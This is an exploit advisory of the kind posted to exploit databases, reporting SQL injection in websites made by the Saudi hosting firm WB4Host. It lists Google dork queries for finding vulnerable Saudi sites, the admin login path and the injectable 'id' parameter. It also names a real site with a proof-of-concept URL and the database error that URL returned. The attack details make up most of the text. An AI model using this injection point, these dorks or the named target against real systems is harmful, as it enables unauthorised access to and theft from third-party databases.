################################################################################################# # Exploit Title : WB4Host Saudi Arabia Hosting Company النطاق الواسع للاستضافة SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/11/2018 # Vendor Homepage : wb4host.com # Tested On : Windows and Linux # Category : WebApps # Version Information : # Google Dork : intext:''النطاق الواسع للاستضافة'' site:sa intext:''Design & developed by wb4host company'' site:sa intext:''WB4HOST'' site:sa # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : /admin ################################################################################################# # SQL Injection Exploit : /en/index.php?content=more_project&id=[SQL Injection] ################################################################################################# # Example Vulnerable Site => [+] fcc.com.sa/en/index.php?content=more_project&id=32%27 => [ Proof of Concept ] => archive.is/8a7fA ################################################################################################# # SQL Database Error : Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 115 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 121 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################